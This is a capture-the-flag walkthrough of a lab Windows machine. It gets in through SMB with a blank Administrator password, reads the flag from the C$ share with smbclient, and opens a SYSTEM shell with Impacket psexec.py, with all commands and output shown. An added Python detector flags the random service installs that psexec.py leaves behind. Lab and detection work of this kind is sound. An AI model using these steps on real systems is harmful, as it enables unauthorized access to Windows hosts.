Port scan first; replace ip with your machine's IP address:
sudo nmap -sV -Pn ip
We see that port 445 is open, which is the Server Message Block (SMB) port. Let's list all shares, trying the Windows default username "Administrator" to do that:
smbclient -L ip -U Administrator
(at the password prompt, just hit Enter)
Output:
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
Let's check out the C$ share:
smbclient \\\\ip\\C$ -U Administrator
(at the password prompt, just hit Enter)
Then we can navigate to the Desktop and download the file flag.txt:
cd \Users\Administrator\Desktop
get flag.txt
(Ctrl+C to exit smbclient)
Then back on our system, we can view the flag:
cat flag.txt
Success! This was one way to pwn this machine. But there is another, where we can even get an interactive SYSTEM shell!
Option 2: Doing it with the Impacket tool psexec.py
Because we can access the ADMIN$ share as well, we can use psexec.py to get an interactive SYSTEM shell. The command for our machine is (replace ip with your machine's IP address):
cd impacket/examples
python3 psexec.py administrator@ip
(hit Enter at the password prompt)
Output:
[*] Requesting shares on 10.129.194.113.....
[*] Found writable share ADMIN$
[*] Uploading file GhsQaPpi.exe
[*] Opening SVCManager on 10.129.194.113.....
[*] Creating service TxXK on 10.129.194.113.....
[*] Starting service TxXK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
Running the command:
whoami
Returns:
nt authority\system
That is the highest privilege level on the box. Now we can navigate freely and get the flag:
cd ..\..
cd \Users\Administrator\Desktop
type flag.txt
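As an added, defender-side example (not part of the original writeup): the psexec.py output above shows exactly what lands on the target, a randomly named executable uploaded to ADMIN$ (the Windows directory) and registered as a randomly named service. On the box that is a Service Control Manager "service installed" event (Event ID 7045), and the Python below scans constructed, flattened sample records for that pattern. The key=value record layout, the name-randomness heuristic and the sample lines are assumptions.

```python
import re

# Constructed sample: Event ID 7045 ("A service was installed in the system")
# records flattened to key=value lines, the way a SIEM export might look.
# The first line mirrors the service/binary names seen in the psexec.py output above.
SAMPLE_LOG = r"""
EventID=7045 ServiceName=TxXK ImagePath=%SYSTEMROOT%\GhsQaPpi.exe AccountName=LocalSystem
EventID=7045 ServiceName=Sysmon64 ImagePath=C:\Windows\Sysmon64.exe AccountName=LocalSystem
EventID=7045 ServiceName=gupdate ImagePath="C:\Program Files\Google\Update\GoogleUpdate.exe" AccountName=LocalSystem
EventID=7036 ServiceName=TxXK State=running
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Binary dropped straight into the Windows root (what an ADMIN$ upload lands as),
# in either the %SYSTEMROOT% form or the expanded C:\Windows form.
ROOT_DROP_RE = re.compile(r'^(?:%SYSTEMROOT%|C:\\Windows)\\([^\\]+\.exe)$', re.IGNORECASE)
# Heuristic (assumption): 4-8 letters, mixed case, no digits or separators looks generated.
RANDOM_NAME_RE = re.compile(r'^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{4,8}$')


def parse_record(line):
    """Split one flattened key=value line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def looks_like_psexec_service(rec):
    """True for a 7045 record whose binary sits in the Windows root under a random name."""
    if rec.get("EventID") != "7045":
        return False
    m = ROOT_DROP_RE.match(rec.get("ImagePath", ""))
    if not m:
        return False
    stem = m.group(1)[:-4]  # strip ".exe"
    return bool(RANDOM_NAME_RE.match(stem) or RANDOM_NAME_RE.match(rec.get("ServiceName", "")))


def find_suspicious_services(log_text):
    """Return (service name, image path) for every record matching the psexec pattern."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec and looks_like_psexec_service(rec):
            hits.append((rec["ServiceName"], rec["ImagePath"]))
    return hits


if __name__ == "__main__":
    for name, path in find_suspicious_services(SAMPLE_LOG):
        print(f"suspicious service install: {name} -> {path}")
```

The legitimate Sysmon64 and GoogleUpdate installs are left alone because their names are not random-looking or their binaries do not sit directly in the Windows root.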